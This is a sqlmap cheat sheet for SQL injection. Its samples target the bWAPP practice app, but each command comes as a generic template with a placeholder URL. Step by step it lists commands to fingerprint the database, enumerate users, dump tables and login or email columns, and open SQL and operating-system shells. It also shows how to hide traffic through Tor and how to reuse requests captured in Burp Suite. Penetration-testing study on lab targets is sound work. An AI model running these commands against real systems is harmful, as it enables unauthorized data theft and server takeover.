<<


PRE-REQS: 
  
1. vulnerable field
2. auth required ?

0x1: GET BANNER 
sqlmap -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b 

.0x1.

0x2: GET DATABASE USERS [CURRENT] 
sqlmap -u "INSERT_VULN_URL" --cookie=" " --users
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --users 

.0x2.

0x3: GET DATABASES 
sqlmap -u "INSERT_VULN_URL" --cookie=" " --dbs
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --dbs 

.0x3.

0x4: GET TABLES 
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME --tables
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP --tables 

.0x4.

0x5: GET COLUMNS FROM TABLE 
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --columns
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --columns 

.0x5.

0x6: DUMP A TABLE 
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --dump 

.0x6.

0x7: DUMP SPECIFIC COLUMNS 
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME -C column_name1,column_name2 --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users -C login,email --dump 

.0x7.

0x8: GET INTERACTIVE DB SHELL 
sqlmap -u "INSERT_VULN_URL" --cookie=" " --sql-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --sql-shell 

.0x8.

0x9: GET SYSTEM OS SHELL 
sqlmap -u "INSERT_VULN_URL" --cookie=" " --os-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --os-shell 

.0x9.

0x10: USE PROXY TOR 
sqlmap --tor --tor-type=SOCKS5 --check-tor -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap --tor --tor-type=SOCKS5 --check-tor -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b 

.0x10.

0x11: EXPLOIT SPECIFIC TECHNIQUE 
sqlmap -u "INSERT_VULN_URL" --cookie=" " --technique=?
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --technique=U 

.0x11.

0x12: USE REQUEST AS FILE 
sqlmap -r [request_filename]
SAMPLE: sqlmap -r request.txt 

.0x12.
  
NOTE: It can be used to validate entire request for any vulnerability. 

--is-dba = to check if the current user is dba, reuslt will be true or false

-p = specify the vuln parameter if it is not clear

NOTES: 
  
1. Vulnerable field can be specified with -D flag.
2. Most of time file results are stored in "/home/USER/.local/share/sqlmap/output/..."
3. Use burpsuite to intercept the traffic to know more about the authentication/session used
4. Copy request from burpsuite to use it using sqlmap.
5. Request file of a login form can be used to see if the parameters are vulnerable.